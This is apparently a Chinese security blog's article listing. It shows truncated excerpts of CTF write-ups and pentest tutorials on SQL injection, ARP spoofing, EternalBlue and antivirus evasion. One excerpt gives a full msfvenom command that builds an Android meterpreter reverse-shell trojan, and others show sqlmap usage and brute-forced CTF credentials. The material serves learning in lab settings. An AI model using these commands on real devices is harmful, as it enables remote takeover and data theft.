网鼎杯第四场web部分解题过程——blog

blog 1. github搜索相关信息 获取到api.php文件 2.爆破uid http://10.220.56.29/WD_UserListAPI.php?uid= ? uid=233 get flag

2018-08-31 16:47:47

阅读数 1335

评论数 2

网鼎杯第四场web部分解题过程——comment

0x01 comment 爆破账号 根据提示去猜解爆破即可 user:zhangwei pass:zhangwei666 0x02 .git泄露 GitHack 0x03 注入查询 查询当前user ', content=(s...

2018-08-31 15:00:26

阅读数 240

评论数 0

kali GPG错误

kali更新出错 网上查找是太久不更新,密钥过期,换新的即可 apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6 apt-get update

2018-05-10 10:39:33

阅读数 414

评论数 0

SQL——SQL简介

0x00 SQL简介SQL简称结构化查询语言(Structured Query Language),是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。0x01 语句结构1. 数据查询语言(DQL: Data Q...

2017-12-17 02:54:25

阅读数 676

评论数 0

实验吧安全杂项--异性相吸

1. 题目 2. 看图 压缩包打开是 都是32字节,异性相吸,可以想到异或运算 3. 上python :#_*_ coding:utf-8 _*_ a = open('1.txt','rb').read()b = open('2.txt','rb').read()lut =''for i...

2017-11-07 21:49:42

阅读数 521

评论数 0

实验吧WEB--拐弯抹角

http://ctf5.shiyanbar.com/10/indirection/index.php 看完提示瞎测试了下直接出来了,直接就不过滤了,,,

2017-11-02 23:18:18

阅读数 657

评论数 0

实验吧WEB--天下武功唯快不破

1.题目 提示响应头,还有fast 2.从提示出发 需要post key 3.对FLAG解码base64 用自带的浏览器插件post提交无果 4.用Python脚本提交(快)import requests import base64r = requests.post(...

2017-11-02 14:35:17

阅读数 2367

评论数 0

实验吧WEB--简单的sql注入之3

1 题目 2 瞎测试一下 id=1-3都回显内容 发现半角‘ 报错3 上神器sqlmap sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" sqlmap -u "http:...

2017-10-29 14:17:50

阅读数 1457

评论数 2

实验吧安全杂项--图片里的动漫

1 题目 2 图片扔进binwalk分析看看3 zip结尾,将后缀改为zip打开看看 4 得到flag.rar文件继续打开看看 5 得到flag.txt,继续打开,需要密码…… 6 **想到的是破解,发现并没有加密的文件 那就再试一下binwa...

2017-10-29 13:25:15

阅读数 750

评论数 1

入侵安卓手机

0x00 环境准备 kali系统 安卓手机 0x01 kali终端生成apk安卓手机木马 命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5555 R > /root/apk.apk 0x0...

2017-10-19 01:39:38

阅读数 3730

评论数 7

编辑器vi的使用

0x01 命令模式 (command mode)在终端输入 vi + 文件名 进入命令模式 0x02 插入模式(insert code)在命令模式下按 i 进入插入模式(insert mode)进行写入编辑,写完之后按下 Esc 回到命令模式 0x03 底行模式(last line cod...

2017-09-24 23:17:15

阅读数 120

评论数 0

Python常见问题解决办法之:环境搭建

工具: Ubuntu(自带的省事) 打开Ubuntu终端直接命令python 开发环境: ipython 直接在Ubuntu终端输入命令ipython 解决导入第三方库问题: 先安装pip命令 sudo apt-get install python pip 再安装第三方库 sudo ...

2017-09-23 02:32:30

阅读数 169

评论数 0

Metasploit笔记--免杀技巧

0x01 杀毒软件杀毒原理 目前的大多数杀病毒软件采用的方法主要是特征码(signatures)查毒方案与人工解毒并行,亦即在查病毒时采用特征码查毒,在杀病毒时采用人工编制解毒代码。特征码装载在杀毒引擎中,用来对磁盘和进程进行扫描,寻找匹配对象0x02 MSF编码器(msfencode) ...

2017-09-09 01:54:35

阅读数 469

评论数 0

常用命令

一,ping     它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包...

2017-08-18 14:30:25

阅读数 174

评论数 0

漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010

一. 准备- 靶机(被攻击电脑) 靶机我们只需要知道系统信息和IP,我这里开的是虚拟机win7,IP:192.168.1.110 - 攻击机(运行攻击程序) 攻击机用的是32位Windows XP sp3,IP:192.168.1.111,用来运行攻击程序,注入木马dll,运行永恒之蓝...

2017-08-17 01:13:29

阅读数 6935

评论数 0

ARP欺骗获取同网段信息

1. 实验环境 kali虚拟机、物理机 kali虚拟机需要桥接网络(环境是需要在同一网段下进行的),至于虚拟机桥接网络连接方式不通的问题,是需要设置路由器的工作模式 分别是虚拟机和物理机的ip信息,都是192.168.1.*的网段下 2. 寻找目标 fping 命令 命令说明fp...

2017-08-14 21:09:42

阅读数 382

评论数 0

重装系统常见问题

Upan启动盘无法自启动问题 快捷键启动,这里附上各机型快捷键 这个真的是个技术手速活,我的联想就得Fn+F12(在重启出现启动画面瞬间狂按)还不一定会进入BIOS 还有一哥们教的野蛮办法,实在不行拿根针戳笔记本底部的小孔保证会进入BIOS(这让我想到暴力破解windows开机密码,直接拔主板电池...

2017-07-23 01:42:53

阅读数 264

评论数 0

Python常见问题解决办法之:python indentationerror:expected an indented block

python indentationerror:expected an indented blockPython indentationerror:预计一块缩进 —-来自百度翻译纳闷半天才发现的错误,看翻译才知道 解决办法看图

2017-07-23 01:14:42

阅读数 585

评论数 0

利用PKAV HTTP Fuzzer破解带有验证码的登录框

1. 工具自取: .netframework:链接:http://pan.baidu.com/s/1i4K2sPf 密码:xpfz PKAV HTTP Fuzzer :链接:http://pan.baidu.com/s/1c1JqD5u 密码:64c32. 工具运行需要安装.net f...

2017-07-01 04:58:49

阅读数 9732

评论数 1

本地搜索神器Everything

1、百度云自行下载:链接:http://pan.baidu.com/s/1bpmyPIn 密码:s5ee2、下载完成后打开文件,如图 选择对应的操作系统3、Ctrl+s导出本地文件目录4、打开导出的文件记事本 例如不小心把电脑管家退出了,想把它找回来 直接在文件目录Ctrl+A(全选)再Ct...

2017-06-30 14:27:31

阅读数 530

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭